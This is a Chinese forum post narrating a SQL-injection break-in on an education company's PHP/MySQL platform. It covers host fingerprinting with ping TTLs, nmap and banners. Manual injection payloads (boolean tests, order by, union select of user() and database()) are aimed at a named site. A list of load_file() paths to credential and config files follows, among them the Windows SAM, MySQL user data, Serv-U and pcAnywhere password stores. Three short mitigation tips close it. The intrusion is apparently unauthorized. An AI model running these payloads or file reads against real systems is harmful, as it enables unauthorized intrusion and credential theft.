找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2816|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:  M5 f3 j! R, N) X# I" {3 k9 W
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……  N  Z5 ?+ F! x) d/ {! c
第一步:获取需要的信息% Q; x  ?& J7 |# x$ w
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
+ e$ y- h$ y" ]  e注:以下为保护特用XXX代替敏感信息( g3 p2 L( `8 Y# o
顺手先PING了一下他们的域名:# q# J8 d2 @8 T, Q. c6 `: o; D2 i
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)( B. R8 {. J5 S& T. d& x6 v- x
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms( I' m, W: g9 E9 }  P( R6 v0 j) e
顺便了解一下TTL,学好基础知识才能一路顺风:" X* M. k. I6 @) R9 E% |
TTL:(Time To Live ) 生存时间" @# }% p8 H, t1 [+ [
指定数据包被路由器丢弃之前允许通过的网段数量。
* w, m. _# _  ?! D, c& e, PTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。) y6 g. m4 s. j/ `" Z
使用PING时涉及到的 ICMP 报文类型
7 ~/ h/ j& ?7 m# x1 Y一个为ICMP请求回显(ICMP Echo Request)( E. w1 Y! G% H4 W! L
一个为ICMP回显应答(ICMP Echo Reply)3 N. I2 p3 O+ w
TTL 字段值可以帮助我们识别操作系统类型。
% G6 E6 Y1 t  B8 _. V, ~UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
0 b8 l3 r, T; W; X5 P: b! @; d! CCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64! ?2 K+ Q) M" K1 X8 T
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
" H1 o8 ^) g7 O6 i6 d9 P% ~- X微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
' j7 K2 G" ]1 J% q, D% |当然,返回的TTL值是相同的( m* H/ w  w& e
但有些情况下有所特殊
: U! W0 u* y7 e) S* i! }LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
# x# V* r4 }- kFreeBSD 4.1, 4.0, 3.4;
* O% Z  h$ I; o2 ^+ lSun Solaris 2.5.1, 2.6, 2.7, 2.8;
) C7 v5 }! ^# y/ L( u: VOpenBSD 2.6, 2.7,5 r* e1 k2 o( _/ P. R
NetBSD) Z, @* J; Y( I4 [: w* d
HP UX 10.20# Q0 c& j" Y/ E: B. M: N. h/ t/ K) F
ICMP 回显应答的 TTL 字段值为 255
: q( Z, m5 b# q& E5 M( pWindows 95/98/98SE
; A. e& N5 F0 O2 m1 l, ZWindows ME
/ s2 J* y- L& Z# O& ?, e3 KICMP 回显应答的 TTL 字段值为 32! l; ]& b) H5 r7 h$ u
Windows NT4 WRKS. r* U* s) Y* `3 Q7 `
Windows NT4 Server
" z4 L8 W  m* |Windows 2000& d  W: w: E/ w" b1 O. S2 S% E
Windows XP
% v2 ~( R# e/ P5 X: Q1 PICMP 回显应答的 TTL 字段值为 128
* F5 h7 }( w/ G, |; Q; T( R这样,我们就可以通过这种方法来辨别操作系统6 L0 }6 j$ R! X/ F$ A* m
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255: j* D0 b9 Z5 g) k- G
用NMAP扫描一下:
! j/ w7 ^' B, Inmap -sT -O XXX.XXX.XXX.XXX
% {4 Z! ?9 L2 I6 ^2 G0 G- b6 u如果没有装WinPcap则会弹出提示:2 O1 m: y; ]0 g, m7 [
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
& b3 u1 q. j/ oade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
8 D0 B( P- Y! Q3 E) ~) mode — Nmap may not function completely
+ Y% y) G7 q- |* \TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher' U" k- Y3 P1 r2 D  H; V
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win4 Z0 H, b# x3 M) J* H
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
9 a/ q2 v! Y2 Bd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v- o! ?; B( B( t9 J$ D
ersions, you may be able to take iphlpapi.dll from another system and place it i
5 M; d) i7 M' s, Q5 q5 Y- pn your system32 dir (e.g. c:\windows\system32)./ \- z5 G  L3 z& g9 s, i
QUITTING!, X7 [9 y# g8 ^1 W8 R
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe9 M; v4 P9 q5 b6 m% R3 M
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:6 Y* n6 O2 O' y1 D  `
Interesting ports on XXX.XXX.XXX.XXX:
; Z& r) m# m, O: Q" T5 g7 M# E" @Not shown: 986 closed ports
' W4 a$ x8 B9 c# hPORT     STATE    SERVICE
" m/ j; P3 e0 q21/tcp   open     ftp+ a. f7 f, e/ k, A5 x
22/tcp   open     ssh
* `% `. L# k! _9 n8 g/ k23/tcp   open     telnet
+ _/ j+ j2 j- I% f: R80/tcp   open     http. l8 P. P; @. d5 I" b0 ?" W
111/tcp  open     rpcbind2 g! G, W! U& R1 y' _
135/tcp  filtered msrpc
1 B+ {1 T! U6 j2 B" }5 x139/tcp  filtered netbios-ssn
8 r4 k  c/ }. T  |0 J445/tcp  filtered microsoft-ds( j+ G. X: H  b! R& R/ q
513/tcp  open     login
. {6 V% l3 l- O0 @( @' ]0 _514/tcp  open     shell
$ l: G: N- k- S4 o- a593/tcp  filtered http-rpc-epmap
4 Y4 J" I/ H* j1720/tcp filtered H.323/Q.931* K; v7 K1 X) m& G
3306/tcp open     mysql
7 r. P5 h9 w' S) E4444/tcp filtered krb524" e. t* f7 V. \/ \7 G) y, Y$ n
Device type: WAP
8 s3 }7 A$ E% p) ~1 `* P! G, I$ A" eRunning: Linux 2.4.X
2 i/ t1 B. h- z6 E" [( BOS details: DD-WRT (Linux 2.4.35s)
) J/ N: Z4 H- w7 S+ ~5 _Network Distance: 13 hops
8 a6 l: M3 S( V6 q3 \看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:# e5 [' e! U9 v! ]0 Q/ ?0 w, k
login as:
+ Z1 [- r- o! o& Z1 q& C1 `) b/ [Telnet23端口也是开着的,用telnet 命令链接一下:
9 u4 |1 k8 i& ]5 p# y# Z. s$ Ztelnet XXX.XXX.XXX.XXX
0 G0 K+ K/ T$ L3 ]提示:
$ `% O; D9 E& ?/ h, A: yRed Hat Enterprise Linux Server release 5.2 (Tikanga)
: p; V* }/ P. H0 a) I8 KKernel 2.6.18-92.el5PAE on an i686
9 G& c: \2 Q# `2 P* s. \. _login:# U  e+ X, ~8 y9 L( h3 P  R, x
获取HTTP头信息:, M% W- s* }- I4 S$ P% x! C
在本地执行如下PHP代码7 j; ~) w# G: _0 y) z, G  Q
<?php* v( [* M3 _: r9 N8 ^% @) l) z
$url = ‘XXX.XXX.XXX.XXX’;% V% w7 ^8 f6 u2 \
print_r(get_headers($url));0 F2 ~5 s& A! W; u+ K
print_r(get_headers($url, 1));" a! S$ N3 m" i& _) Q6 x
?>
9 R3 M. v# r" ^& D将以上代码保存为PHP文件,执行:  P* N) ?- H2 ^* z! Y& @. v
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )* k: M. I7 h+ H2 i" u% y
现在可以得出结论:
& |% _) x! U, j系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)7 X3 t" l- @4 i$ Z
内核版本:Kernel 2.6.18-92.el5PAE on an i6861 L8 ]% ]; Y$ b; L9 u( Z0 S6 b
WEB服务器版本:nginx/0.7.61+ D& q4 ?5 s4 L, [
第二步,开始测试寻找漏洞3 k( X- k  \$ r2 U7 C9 w( y
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。, [; j3 c" Y: C9 P
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
* L" n; Z2 \. W! U8 t8 A) j$ N2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
) E# _% K: x, m, L3 R6 Jhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
2 {5 L& P. g" D( m- F. _! vhttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
2 Y8 Z$ d2 M# K5 L0 U0 I恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续6 n9 `" T  ^, S% ^3 z  K( I
3、手工注入:  q3 F8 ^8 V5 R1 \/ V' t
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
  N! p6 }/ @. N% k3.1 猜测当前表字段数% u4 F/ y; e. s
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
- l/ X6 R! ]- B4 O: Y此处猜测有个简单的算法,都是有技巧的吗,呵呵
- T$ S  s3 L2 \2 P5 N8 B: U算法简单如下:+ T4 ]; U9 I1 |7 V
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;, j) O! u& Z9 m3 ~7 L7 K8 G% l; g
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
' [4 f+ ?, L/ q# \需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。$ y4 a: J! u4 _
以此来判断,是否过界,配合取中算法猜出字段数。1 {7 |5 V9 X# w; `
举例:
& ]7 i' g0 ^+ ?# M5 @http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常* y: ]& Q* }8 D9 d
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误, R. b$ a! X( F" [
此时3则为我们要找的字段数。
& ]+ d) Y# a7 _' V5 v% f3.2 配合union联合查询字段在页面所位置4 O1 a2 _, m+ ~, ]' m) i$ p& d
我们已经知道了字段数为3,此时则可以做如下操作:
- I) k8 B+ f1 t' g- x  g: R- Dhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
& e: ^8 a( Y3 q1 p( r" U, s# e  L
5 d5 f0 O9 R! p- S3 T& l这样就可以测试到哪些字段在页面上有所显示了,如图:+ p7 {' O' W' |9 ^# W: G

( ^' x( N1 s9 U9 s: D- p3 `3.3 查敏感信息/ t! f0 `- k' Q9 a4 o- y3 @
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
9 N5 I3 n# E2 S- vhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
6 B% A. Y2 Z3 R/ z( z& U3 b3.3.1 先查数据库用户、数据库名,以备后用,如图:, v$ n! f! w  z8 p( Z' Y

. U; S% z0 Q6 u得到数据库用户为root、数据库名为DBxx;
8 N9 P& q; \4 j+ P; z1 J6 \3.3.2 查配置文件
& \5 y2 F& ?- J查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。$ N' y2 `* |# b9 ?
查看文件有一定的条件限制:
# U( L: {( S% Y- O欲读取文件必须在服务器上
$ k6 Y' [( A* {) l必须指定文件完整的路径
+ T# n2 D) O+ M' C, Z  d必须有权限读取并且文件必须完全可读( e6 f) `  y' N
欲读取文件必须小于 max_allowed_packet
9 r, q+ e& B8 h; p+ lMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
) [- Z% V4 s8 A$ Z1 x/ ~常用的一些:
' _8 p& m( x: G( g/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件; `$ n: Q- K# Q- T$ j9 u$ D
/usr/local/apache2/conf/httpd.conf$ R5 M1 e! P! l" d7 e
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
( M+ Z$ c, d, [; e+ w/usr/local/app/php5/lib/php.ini //PHP相关设置% B4 l, I1 i6 u! A; r; J$ ?
/etc/sysconfig/iptables //从中得到防火墙规则策略2 I+ M9 z  f, Q5 f4 u
/etc/httpd/conf/httpd.conf // apache配置文件+ r+ n/ I8 d. n) t, q
/etc/rsyncd.conf //同步程序配置文件
5 r$ X5 i  r8 I. n6 N* w' ~/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.% y6 P# D! ?. d, V2 Q
/etc/my.cnf //mysql的配置文件
) P" R: y& h: H7 S# y: l/ [/etc/redhat-release //系统版本' Z4 ^% ]7 n  c( h+ P7 `. J
/etc/issue7 I. m- W7 d- s' C+ ~& U; Y2 j
/etc/issue.net
4 P7 G- p3 h- o9 A; Uc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码# x2 v) D1 ]8 @% y* t9 v3 o0 F! K
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码! Z# o3 n5 @0 [! c1 Z+ u* `. G
c:\Program Files\Serv-U\ServUDaemon.ini
: V3 q* |0 @! ac:\windows\my.ini //MYSQL配置文件
+ Q) N# P2 J9 O% N5 G  }# Wc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件# f9 y5 [  c! u3 ~4 E, U7 z9 P# {
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
5 v7 V5 c- s( _- s% y6 t' Xc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码0 u$ e8 I! w0 Y) U1 q
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
, m- D: z0 g  f% vc:\Program Files\RhinoSoft.com\ServUDaemon.exe
! C, l% {' P/ x/ z( p- _C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
2 `* z3 H3 [3 M: D* l1 g//存储了pcAnywhere的登陆密码1 d" P9 O: g( i/ f7 Z( W
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。/ O' D' G9 D/ Y+ T8 u3 J
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。* B, e6 ^3 u3 }
最后:防范措施; q. m; P6 |3 q# F
1、修复PHP注入漏洞;2 G3 U# {0 `* R5 r2 y
2、Mysql使用普通权限的用户;
- S9 B' K. ?2 a/ Y# v/ \& {3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表